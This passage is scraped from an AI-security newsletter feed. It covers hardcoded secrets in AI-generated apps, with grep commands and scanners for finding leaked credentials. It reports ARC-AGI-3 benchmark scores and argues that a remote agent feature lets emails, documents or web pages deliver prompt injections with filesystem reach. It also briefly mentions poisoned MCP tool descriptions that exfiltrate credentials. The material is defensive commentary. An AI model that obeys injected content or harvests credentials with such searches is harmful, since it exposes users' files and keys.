https://substackcdn.com/image/fetch/$s_!XUxb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Here&#8217;s the part that makes this worse than a human mistake: researchers at <a href="https://www.invicti.com/blog/security-labs/security-issues-in-vibe-coded-web-apps-analyzed">Invicti</a> found that each LLM has its own set of <strong>common secrets</strong> it reuses across different generated apps. The same JWT signing secrets, the same placeholder passwords like <code>password123</code> and <code>admin123</code>, appearing in app after app. Those aren&#8217;t random. They&#8217;re fingerprints. An attacker who knows which model built your app can try the model&#8217;s favorite defaults before brute-forcing anything. Moltbook, an AI-built social network, <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">shipped its entire credential store to the browser</a>. No exploit required. Open DevTools, read the keys.</p><h2>What Should You Actually Grep For?</h2><p>The secrets AI drops into your code follow patterns. Knowing the patterns turns a vague &#8220;check for secrets&#8221; into a concrete five-minute audit.</p><p><strong>Inline credentials in source files.</strong> Strings like <code>password =</code>, <code>api_key =</code>, <code>secret =</code>, <code>token =</code> sitting in Python, JavaScript, or config files. The AI writes them as variable assignments, sometimes with a helpful <code># TODO: move to env vars</code> comment that never gets acted on. Connection strings are the worst offender: <code>postgres://user:password@host:5432/db</code> contains the full credential in a single copy-pasteable line.</p><p><strong>Client-side bundle leaks.</strong> Frontend frameworks bundle environment variables into JavaScript at build time. If the AI sets <code>NEXT_PUBLIC_SUPABASE_KEY</code> or <code>REACT_APP_STRIPE_SECRET</code> in a <code>.env</code> file, those values compile directly into the JS bundle that ships to every user&#8217;s browser. Grep your <code>build/</code> or <code>dist/</code> directory for key patterns. If they&#8217;re there, they&#8217;re public.</p><p><strong>The </strong><code>.env</code><strong> file that never made it to </strong><code>.gitignore</code><strong>.</strong> The AI creates <code>.env</code>, populates it with your API keys, and never adds it to <code>.gitignore</code>. That one missing line is the difference between secrets stored locally and secrets committed to version control. Check it now: <code>grep -r '.env' .gitignore</code>. If nothing comes back, fix it before your next commit.</p><p><strong>Git history.</strong> Deleting a secret from your current code does not delete it from your repo. Every commit is permanent. </p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;ac8b12c2-623d-4a95-884a-92076ac024b1&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">git log --all -p | grep -i 'api_key\|secret\|password\|token' </code></pre></div><p>against your repo will show you everything that was ever committed. If secrets were there and got &#8220;removed,&#8221; they&#8217;re still there. And if you&#8217;re connecting AI agents via MCP, those <a href="https://www.toxsec.com/p/lets-poison-the-mcp">tool descriptions can be poisoned</a> to exfiltrate whatever credentials the agent can see.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mTGh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mTGh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png 424w, https://substackcdn.com/image/fetch/$s_!mTGh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png 848w, https://substackcdn.com/image/fetch/$s_!mTGh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png 1272w, https://substackcdn.com/image/fetch/$s_!mTGh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mTGh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png" width="481" height="650.8508371385084" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:889,&quot;width&quot;:657,&quot;resizeWidth&quot;:481,&quot;bytes&quot;:42509,&quot;alt&quot;:&quot;Grep Targets: Checklist &#8212; Hardcoded secrets detection checklist for vibe-coded apps showing four grep commands targeting inline credentials, client bundle leaks, missing gitignore entries, and git history residue in AI-generated code.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193004818?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Grep Targets: Checklist &#8212; Hardcoded secrets detection checklist for vibe-coded apps showing four grep commands targeting inline credentials, client bundle leaks, missing gitignore entries, and git history residue in AI-generated code." title="Grep Targets: Checklist &#8212; Hardcoded secrets detection checklist for vibe-coded apps showing four grep commands targeting inline credentials, client bundle leaks, missing gitignore entries, and git history residue in AI-generated code." srcset="https://substackcdn.com/image/fetch/$s_!mTGh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png 424w, https://substackcdn.com/image/fetch/$s_!mTGh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png 848w, https://substackcdn.com/image/fetch/$s_!mTGh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png 1272w, https://substackcdn.com/image/fetch/$s_!mTGh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F57adfbd8-2281-4e02-9777-ea73cb600a7a_657x889.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>How Do Gitleaks and TruffleHog Catch Leaked Secrets?</h2><p>Two tools, both free, both open source. They solve different halves of the same problem.</p><p><a href="https://github.com/gitleaks/gitleaks">Gitleaks</a> is a pre-commit hook, a check that fires automatically before your code enters the repo. It scans staged changes against 160+ credential patterns (AWS keys, Slack tokens, database strings, the works) and blocks the commit if it finds a match. Install takes one command. Add a <code>.pre-commit-config.yaml</code> with the Gitleaks hook, run <code>pre-commit install</code>, and secrets stop entering your repo entirely. It runs in milliseconds. You won&#8217;t notice it until it saves you.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3JCg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3JCg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png 424w, https://substackcdn.com/image/fetch/$s_!3JCg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png 848w, https://substackcdn.com/image/fetch/$s_!3JCg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png 1272w, https://substackcdn.com/image/fetch/$s_!3JCg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3JCg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png" width="525" height="325" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:429,&quot;width&quot;:693,&quot;resizeWidth&quot;:525,&quot;bytes&quot;:24968,&quot;alt&quot;:&quot;Gitleaks Pre-Commit: Terminal: Gitleaks v8.24.2 pre-commit hook blocking a git commit after detecting three secrets including Stripe API key, PostgreSQL connection string, and SendGrid key with entropy scores.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193004818?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Gitleaks Pre-Commit: Terminal: Gitleaks v8.24.2 pre-commit hook blocking a git commit after detecting three secrets including Stripe API key, PostgreSQL connection string, and SendGrid key with entropy scores." title="Gitleaks Pre-Commit: Terminal: Gitleaks v8.24.2 pre-commit hook blocking a git commit after detecting three secrets including Stripe API key, PostgreSQL connection string, and SendGrid key with entropy scores." srcset="https://substackcdn.com/image/fetch/$s_!3JCg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png 424w, https://substackcdn.com/image/fetch/$s_!3JCg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png 848w, https://substackcdn.com/image/fetch/$s_!3JCg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png 1272w, https://substackcdn.com/image/fetch/$s_!3JCg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8f2010c2-662d-4e81-b1ea-b8dee5bbe436_693x429.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><a href="https://github.com/trufflesecurity/trufflehog">TruffleHog</a> goes deeper. Where Gitleaks guards the gate, TruffleHog scans your entire git history, plus S3 buckets, Docker images, Slack workspaces, and CI/CD logs. It classifies 800+ credential types. Its differentiator is <strong>credential verification</strong>: when it finds something that looks like an AWS key, it actually authenticates against the AWS API to confirm the key is live. You don&#8217;t get a list of maybes. You get a prioritized list of confirmed active credentials sorted by blast radius. Run it in CI/CD alongside Gitleaks and you&#8217;ve got prevention at the gate plus depth scanning behind it.</p><p>The standard play: Gitleaks pre-commit for speed, TruffleHog in CI/CD for depth. Secrets that predate your scanning setup get caught, verified, and queued for rotation. For the full <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">compound attack chain</a> that starts with these leaked credentials and ends with full app compromise, the pillar piece <a href="https://www.toxsec.com/p/is-vibe-coding-safe-3-security-checks">walks the whole op</a>. And if you&#8217;re running AI agents with access to your codebase, the <a href="https://www.toxsec.com/p/openclaw-is-a-wildly-insecure">OpenClaw teardown</a> shows how exposed API keys in agent configs create the same initial access vector at machine scale. The <a href="https://www.toxsec.com/p/molt-road-and-ai-black-markets">Molt Road investigation</a> goes further: stolen agent credentials are already being traded in automated black markets.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Does deleting a secret from my code remove it from git history?</h3><p>No. Git stores every version of every file permanently. Removing a secret in a new commit means the current branch no longer shows it, but <code>git log -p</code> still exposes it in the diff where it was first introduced. Anyone who clones your repo has the full history. To actually purge a secret, you need tools like <code>git-filter-repo</code> to rewrite history, then force-push. Easier to rotate the credential and treat the old one as compromised.</p><h3>Can I just use environment variables instead of hardcoding secrets?</h3><p>Environment variables are the right call, but they&#8217;re only half the fix. The AI will create a <code>.env</code> file and populate it with your keys, then never add <code>.env</code> to <code>.gitignore</code>. If that file gets committed, your &#8220;environment variable&#8221; approach just moved the secret from the source file to a different file in the same repo. Always verify <code>.env</code> is in <code>.gitignore</code>. For production, use a secrets manager (AWS Secrets Manager, HashiCorp Vault, Doppler) so credentials never exist in files at all.</p><h3>How often do AI coding tools actually hardcode credentials?</h3><p>Frequently enough to be the single most common security finding in vibe-coded apps. Invicti&#8217;s analysis of vibe-coded web applications found hardcoded secrets in a significant portion of generated apps, with each LLM model reusing its own set of favorite placeholder credentials across different projects. GitGuardian&#8217;s reporting found that repositories using AI coding tools showed a measurably higher rate of secret exposure than those without.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[Gemini 0.37%, Claude 0.25%, Grok 0%. Humans Destroyed Them All: ARC-AGI-3]]></title><description><![CDATA[The new benchmark proved every frontier model can&#8217;t reason like a child. That same week, Anthropic gave your phone a remote shell to your computer.]]></description><link>https://www.toxsec.com/p/gemini-037-claude-025-grok-0-humans</link><guid isPermaLink="false">https://www.toxsec.com/p/gemini-037-claude-025-grok-0-humans</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Tue, 31 Mar 2026 13:31:49 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/192548920/6ef16e61ac3b40c929cf51ee898b39f9.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> ARC-AGI-3 landed on March 25, 2026. Gemini 3.1 Pro scored 0.37%. Claude Opus 4.6 scored 0.25%. Grok-4.20 scored 0%. Humans solved 100%. That same week Anthropic shipped Claude Dispatch, a feature that turns your phone into a live shell into your desktop agent. This is the gap: we cannot explain what these models can&#8217;t do, and we keep shipping them more reach anyway.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What ARC-AGI-3 Is Actually Testing in AI Agents</h2><p>Most benchmarks test knowledge. Ask a model to name a drug interaction, solve a merge sort, or cite the right CVSS score. It pattern-matches against its training data and answers.</p><p><strong>ARC-AGI-3 strips all of that away.</strong> The benchmark drops an AI agent into a 64x64 color grid with zero instructions, zero goal description, zero prior training on that environment. The agent has to figure out the rules, infer what winning looks like, and execute a strategy, all from scratch. No language cues. No hints. Just a grid and a set of controls. You can try the public demo yourself at <a href="https://arcprize.org/arc-agi/3">arcprize.org/arc-agi/3</a>.</p><p>A 10-year-old solves these in minutes. The kid has never played this specific game, but they&#8217;ve spent a decade navigating cause-and-effect feedback loops in the physical world. They see a health bar and know not to brute-force. They see two matching objects and know to connect them. That inference chain is automatic. If you want a breakdown of the underlying AI concepts, the <a href="https://www.toxsec.com/p/ai-security-glossary-and-attack-taxonomy">ToxSec AI Security Glossary</a> covers fluid intelligence and abstract reasoning in the context of agent attack surfaces.</p><p>Models don&#8217;t have that background. They have token prediction trained on static text, which is exactly the wrong tool for inferring novel goals from a foreign environment.</p><h2>Every Frontier Model Scored Under 1% on ARC-AGI-3</h2><p>The numbers from the March 25 release are brutal. Gemini 3.1 Pro led at 0.37%. GPT-5.4 came in at 0.26%. Claude Opus 4.6 scored 0.25%. Grok-4.20 scored exactly 0%. Humans solved all 135 environments at 100%. Not a single frontier model broke a full percentage point.</p><p>The scoring metric is RHAE (Relative Human Action Efficiency). It&#8217;s not binary pass/fail. If a human completes a level in 10 moves and the agent takes 100, the agent scores 1% on that level because efficiency is squared. The models aren&#8217;t just losing. <strong>They are brute-forcing in the wrong direction</strong>, burning actions on random exploration because they cannot form a coherent model of what the environment is doing.</p><p>One result in the technical paper makes the architecture problem clear. Claude Opus 4.6 scored 97.1% on a familiar environment using a hand-built harness. On an unfamiliar environment with the same harness: 0%. The scaffolding was doing the reasoning. Strip the human-built structure and the model has nothing.</p><p>This is what we covered in <a href="https://www.toxsec.com/p/ai-and-cybersecurity">the AI and Cybersecurity stream</a> earlier this year: these models are narrowly smart. Superhuman at specific lookup tasks, near-zero at novel goal inference. ARC-AGI-3 just made that quantitative. The $2M prize pool on Kaggle runs through December 2026. When someone cracks it, that&#8217;ll be worth paying attention to. Nobody&#8217;s close yet.</p><h2>Claude Dispatch Security Risk and the Prompt Injection Surface</h2><p>The same week ARC-AGI-3 showed every frontier model failing a 10-year-old&#8217;s puzzle, Anthropic shipped Claude Dispatch. Scan a QR code on your phone. Your phone now talks to the Claude session running on your desktop. You can send it tasks, approve commands, check in on a running job from anywhere. Useful. Also a serious rethink of the threat model.</p><p>Dispatch is architecturally different from the Cowork sandbox. Cowork scopes Claude to a specific folder. You pick what it can touch. Classic principle of least privilege. <strong>Dispatch runs outside that sandbox.</strong> It operates on your live session with full filesystem reach. Any content the agent reads, email, browser output, documents, is now a potential prompt injection delivery vehicle with direct access to everything on the machine.</p><p>We&#8217;ve broken down the MCP tool poisoning chain in detail at <a href="https://www.toxsec.com/p/lets-poison-the-mcp">Watch Me Poison Your MCP</a>. The principle is the same here: the agent cannot reliably distinguish trusted instructions from attacker-controlled content embedded in its context. ARC-AGI-3 just proved models don&#8217;t abstract-reason under novel conditions. Prompt injection is a novel condition by design. The attacker writes content the agent was never trained to treat as adversarial.</p><p>The mitigation that actually works is what we run at ToxSec: dedicated hardware, network-segregated from anything sensitive, only files you&#8217;d be comfortable showing a stranger. Assume breach from day one. For the full playbook on what <a href="https://www.toxsec.com/p/the-magic-string-that-bricks-claude">prompt injection does inside an active Claude agent</a>, that piece covers the mechanics. If you&#8217;re running Dispatch, also read <a href="https://www.toxsec.com/p/secure-your-mcp">how to secure your MCP server</a>. The same defense layers apply.</p><p>ARC-AGI-3 tells us the model can&#8217;t reason like a child. Claude Dispatch ships the assumption that it can.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What is ARC-AGI-3 and why did all AI models score below 1%?</h3><p>ARC-AGI-3 is an interactive reasoning benchmark where AI agents are dropped into novel game-like environments with no instructions and must infer the rules, objectives, and winning strategy from scratch. Every tested frontier model, including Claude Opus 4.6, GPT-5.4, Gemini 3.1, and Grok-4.20, scored below 1% because they lack the abstract goal-inference humans run automatically. The benchmark isolates fluid intelligence from knowledge recall, and current models fail at the former while excelling at the latter.</p><h3>What makes Claude Dispatch a security risk compared to Claude Cowork?</h3><p>Claude Dispatch operates outside the Cowork sandbox and shares the same session as your active Claude instance, giving it default full filesystem access. Cowork lets you scope access to specific folders, applying least-privilege. Dispatch removes that boundary. Any content the agent reads, emails, documents, web pages, can carry prompt injection payloads with direct reach to everything on the machine, significantly expanding the blast radius of a successful injection.</p><h3>Does a 0% score on ARC-AGI-3 mean AI agents are useless for real work?</h3><p>No. The benchmark deliberately strips away training data and instructions to isolate one specific gap: novel goal inference without scaffolding. Current AI agents are highly effective inside well-structured domains where engineers have built the harness. The danger is when deployment decisions assume the capabilities the benchmark just proved don&#8217;t exist yet. ARC-AGI-3 tells you where the guardrails are missing, not that the car doesn&#8217;t run.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[Stop Multimodal Prompt Injection: JPEG, Re-Encode & Dual-LLM Fixes]]></title><description><![CDATA[Vision and audio inputs carry adversarial instructions past your guardrails, and the attack surface is already in production.]]></description><link>https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio</link><guid isPermaLink="false">https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Thu, 26 Mar 2026 13:30:44 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!fd5-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fd5-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fd5-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!fd5-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!fd5-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!fd5-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fd5-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c10ce79b-a257-449f-80c8-977aca3dc61d_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:8507525,&quot;alt&quot;:&quot;multimodal prompt injection attack image audio vision language model guardrails bypass adversarial perturbation steganographic embedding VLM ALLM 